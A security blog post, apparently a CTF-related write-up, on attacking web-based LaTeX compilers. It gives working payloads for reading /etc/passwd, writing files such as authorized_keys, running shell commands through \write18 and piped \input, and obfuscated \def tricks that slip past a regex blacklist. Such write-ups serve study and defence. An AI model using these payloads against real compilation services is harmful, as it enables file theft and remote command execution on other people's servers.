Hacking with LaTeX

In this blogpost I want to outline basic attacks against web based LaTeX compilers. This inspired me to create the Web90 - TexMaker challenge.

TexMaker was a simple website where one could enter LaTeX code and the server would create a PDF file using pdflatex. You'll find similar services on the internet. Unfortunately, user input should never be trusted and LaTeX code is no exception to this rule.

That's because LaTeX is turing complete and that means that you can write functioning programs with it - I'm still waiting for the first malware written in LaTeX sent as an attachment in phishing mails :)

However, I want to focus on existing ways and possibilities to read, write or execute arbitrary files with LaTeX. This blogpost tries to be an extension to this paper. Some packages like TikZ need to call external programs to work properly. Therefor Pdflatex comes with three operation modes:

-no-shell-escape

Disable the \write18{command} construct, even if it is enabled in the texmf.cnf file.

-shell-restricted

Same as -shell-escape, but limited to a 'safe' set of predefined commands.

-shell-escape

Enable the \write18{command} construct. The command can be any shell command. This construct is normally disallowed for security reasons.

With \write18 you can write to the 18th filedescriptor which is the commandline by default.

You can try all the following examples at papeeria.com. I've notified them of the potential risks and they replied:

Hello Sebastian,
thanks for being pro-active! Yes, we run tex compiler with --shell-escape. However, every compile cycle runs in its own Docker container which is isolated from the host system and from other containers. So, users can do whatever they want, even try to run rm -rf / but the effect of their actions will apply to their one-time container only.

Update (10.03.16, 15:20): I want to clarify that this is not intended to show Papeeria up. I think that their setup with Docker and a non-privileged user is solid. I haven't tried to escape the Docker container, but if you're aware of a way to accomplish this, please email contact [a/t] papeeria dot com.

Reading files

All modes allow arbitrary files to be read from the filesystem. The easiest way is to use \input:

\input{/etc/passwd}

This will load the contents of the /etc/passwd file into the PDF file.

If the included file coincidentally ends with .tex, \include can be used:

\include{password}

This will include password.tex from the current working directory.

If the above commands are filtered or blocked by a blacklist, the following workarounds can be used. The first one reads only the first line:

\newread\file
\openin\file=/etc/passwd
\read\file to\line
\text{\line}
\closein\file

We create a new \file handle and open the file /etc/passwd for reading. Then we read one line into the \line variable, output it as text (\text) and close the handle finally.

Usually files have multiple lines and the following code handles that:

\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
    \read\file to\fileline 
    \text{\fileline}
\repeat
\closein\file

It loops over all lines until it reaches an EOF.

What could an attacker do with this?

Read sensitive files (e.g. SSH private keys, configuration files, ...)

Writing files

Another interesting thing is writing data. This only works if at least the restricted write18 mode is enabled. It can be done with the following set of commands:

\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile

This writes the string Hello-world into cmd.tex.

What could an attacker do with this?

Delete a files' content by writing nothing to it.
Overwrite files with foreign data (e.g. ~/.ssh/authorized_keys)

Executing commands

Let's get to the most interesting part of this blogpost. This only works with write18 enabled, which means that -shell-escape has to be set.

The most simple way to execute commands is:

\immediate\write18{env}

This runs the env command.

This, however, will redirect the output to stdout:

(/usr/share/texmf-dist/tex/latex/latexconfig/epstopdf-sys.cfg))engine=pdftex
SELFAUTODIR=/usr
SELFAUTOGRANDPARENT=/
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
SELFAUTOPARENT=/
SELFAUTOLOC=/usr/bin
_=/usr/sbin/env
PWD=/var/www/ctf.internetwache.org.local/compile
LANG=de_DE.UTF8
progname=pdflatex
SHLVL=2

But that won't help us if we don't see the compilation log. A way to work around this limitation is to write stdout to a file and read it again:

\immediate\write18{env > output}
\input{output}

The above env command will most likely throw an error because the output contains LaTeX special characters:

(/usr/share/texmf-dist/tex/latex/latexconfig/epstopdf-sys.cfg)) (./test.tex
! Missing $ inserted.
<inserted text> 
                $
l.7 _
     =/usr/sbin/env
? 
! Emergency stop.
<inserted text> 
                $
l.7 _
     =/usr/sbin/env
!  ==> Fatal error occurred, no output PDF file produced!

A workaround for that is to base64 encode the output:

\immediate\write18{env | base64 > test.tex}
\input{text.tex}

You can use the \input command to do both steps at once:

\input|ls

\input|ls|base64

I don't think that I have to elaborate on how an attacker could do harm by executing commands.

Bypassing blacklists

During the Internetwache CTF 2016, I used the following blacklist:

		if(preg_match("(input|include)", $CONTENT)) {
			echo 'BLACKLISTED commands used';
		} else {

With the newly acquired knowledge you should be able to come up with a bypass. For example this one:

\immediate\write18{ls|base64 > test.txt}
\newread\file
\openin\file=test.txt
\loop\unless\ifeof\file
    \read\file to\fileline
    \text{\fileline}
\repeat
\closein\file

We write the command's output to test.txt and read it line-wise.
Okay, cool, but can we bypass the following blacklist?

"(input|include|write18|immediate)"

Yes, we can! We can use \def to bypass the filter and create a temporary file to read the output:

\def \imm {\string\imme}
\def \diate {diate}
\def \eighteen {\string18}
\def \wwrite {\string\write\eighteen}
\def \args {\string{ls |base64> test.tex\string}}
\def \inp {\string\in}
\def \iput {put}
\def \cmd {\string{test.tex\string}}

% First run
\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{\imm\diate\wwrite\args}
\write\outfile{\inp\iput\cmd}
\closeout\outfile

% Second run
\newread\file
\openin\file=cmd.tex
\loop\unless\ifeof\file
    \read\file to\fileline 
    \fileline
\repeat
\closein\file
Run1

This time you need to run the compilation two times:

First run: Create the cmd.tex with the actual exploit code.

cmd.tex's content:

\immediate\write18{ls |base64> test.tex}
\input{test.tex}

Second run: Read cmd.tex and execute commands.

We can use the fact that \fileline will execute the actual line from the temporary cmd.tex file.

If the blacklist does not contain the immediate keyword, you can use the following block to execute and read the output in one run:

% First run
\newwrite\outfile
\immediate\openout\outfile=cmd.tex
\immediate\write\outfile{\imm\diate\wwrite\args}
\immediate\write\outfile{\inp\iput\cmd}
\immediate\closeout\outfile

Conclusion

This can turn out bad for web based LaTeX compilers as well as for you. Never compile LaTeX code from an untrusted source.
Another thing you should have learned is that blacklists are bad and one will find a bypass eventually.

-=-

Sebastian Neef - 0day.work

Reading files

Writing files

Executing commands

Bypassing blacklists

Conclusion